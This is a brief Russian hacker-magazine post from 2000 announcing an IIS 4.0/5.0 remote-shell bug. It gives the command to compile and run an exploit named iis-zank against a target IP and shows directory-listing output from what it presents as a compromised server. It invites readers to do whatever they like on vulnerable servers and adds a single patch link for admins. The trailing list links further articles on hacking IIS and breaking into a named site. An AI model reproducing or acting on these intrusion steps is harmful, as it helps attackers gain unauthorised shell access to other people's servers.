Привет Перцы, свеженький
баг от 19 октября 2000 г!

Позволяет нам творить
безумные вещи на серваках NT/IIS4.0/IIS5.0 Ошибки в
передаваемом URL дают REMOTE SHELL... Для
нормальной работы свежего exploit`а
нужен *NIX shell, вводим в joe следующий текст,
сохраняемся Ctrl+K->X, затем компилим: gcc iis-zank.c,
запускаем :

./iis-zank -t IP_OF_TARGET -i

Все.... Мы можем делать все
,что угодно, пример:
C> dir c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Mon, 23 Oct 2000 07:34:45 GMT
Content-Type: application/octet-stream
Volume in drive C is SOMEONE
Volume Serial Number is 3914-1581

 Directory of c:\

11.05.00  13:03         <DIR>         
DOS
11.05.00  13:03         <DIR>         
I386
11.05.00  13:03         <DIR>         
HP
22.02.99  14:40                    
47 AUTOEXEC.BAT
23.02.99  16:55                    
87 CONFIG.SYS
11.05.00  13:19         <DIR>         
WINNT
11.05.00  13:15         <DIR>         
BATCH
11.05.00  13:21         <DIR>         
Program Files
11.05.00  13:23         <DIR>         
TEMP
11.05.00  13:23         <DIR>         
InetPub
11.05.00  14:00         <DIR>         
MSSQL7
11.05.00  14:12         <DIR>         
Microsoft Site Server
11.05.00  14:17         <DIR>         
exchsrvr
18.05.00  09:59         <DIR>         
DNews
11.05.00  13:21                   
294 BOOT.PCP
23.10.00  11:34                   
642 STATS.LOG
10.08.00  12:21                     
0 QUERY.LOG
28.08.00  15:02               
262 144 28_08_2000.evt
28.08.00  15:02               
524 288 28_08_2000_Application.evt
11.10.00  08:54                
65 536 sys.mdb
             
20 File(s)        853═038 bytes
                           
565═411═840 bytes free

Инфа для нерадивых
админов - пофиксить дыру можно скачав и
установив patch: 
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862

  • Как был взломан mgimo.ru

    Внимание! Автор статьи не несет никакой ответственности за правовые последствия взлома. Ст…
    28.12.2000
    28 мин на чтение

  • Таже ошибка, но в другом месте

    Как-то раз было скучно, и решил я посканить сеть. Запустил любимый SSS, нашел по Альтавист…
    09.02.2001
    20 мин на чтение

  • Западлишко на офисную тему

    Зайдя на ксакепа в очередной раз, заметил, что опубликовано мое западлишко на офисную тему…
    20.01.2001
    2 мин на чтение

  • Win32Asm Tutorial #4

    Ну что, программа сервака трояна ещё не убедила кульного хацкера, типа тебя, в том, что Ас…
    21.05.2001
    38 мин на чтение

  • IIS 4.0 & Sss: работа над ошибками

    Основная тема всего нижеследующего бреда  - проблемы в обработчике запросов драйвера MS O…
    01.02.2001
    5 мин на чтение

  • Win32Asm Tutorial #3

    А теперь перейдём к очередной проге - серверу простой (но это ещё не значит мало функциона…
    17.05.2001
    42 мин на чтение

  • Взлом IIS

    Ну здравтсвуй , гуманоид ищущий познания. Наконец то я сподвигся написать об этом человече…
    14.10.2000
    105 мин на чтение

  • Установка eggdrop на IRC

    После предыдущих статей про IRC обрушился просто лавинный поток писем, львиная часть котор…
    21.08.2000
    26 мин на чтение

  • Дырка в IE/Outlook: траблы с java

    Детали: В IE 5.
    19.10.2000
    7 мин на чтение

  • Дырка в Microsoft Exchange 5.5

    Что бы по быстренькому организовать DoS атаку сервер с Microsoft Exchange 5.
    20.09.2000
    11 мин на чтение

  • Прикол в Виндах

    Прислал:
    11.10.2000
    51 сек на чтение

  • Приколы Windows

    Малоизвестные команды Windows 9xx для запуска из командной строки:
    07.08.2000
    6 мин на чтение

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии